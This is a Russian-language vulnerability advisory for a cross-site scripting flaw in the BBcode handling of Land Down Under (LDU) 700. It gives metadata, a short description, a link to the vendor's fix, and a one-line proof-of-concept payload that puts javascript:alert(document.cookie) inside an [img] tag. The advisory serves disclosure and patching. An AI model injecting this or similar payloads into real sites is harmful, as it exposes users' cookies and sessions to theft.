Межсайтовый скриптинг в Land Down Under (LDU) в обработке BBcodes

Дата публикации:
31.05.2004
Дата изменения:
14.03.2009
Всего просмотров:
1039
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Land Down Under (LDU)
Уязвимые версии: Land Down Under (LDU) 700

Описание: Уязвимость обнаружена в Land Down Under (LDU) в обработке BBcodes. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

[img]javascript:alert(document.cookie);[/img]

URL производителя:http://ldu.neocrome.net/

Решение: Установите обновленную версию программы: http://ldu.neocrome.net/page.php?id=1357

Ссылки: LDU (land down under) xss vulnerability

или введите имя

CAPTCHA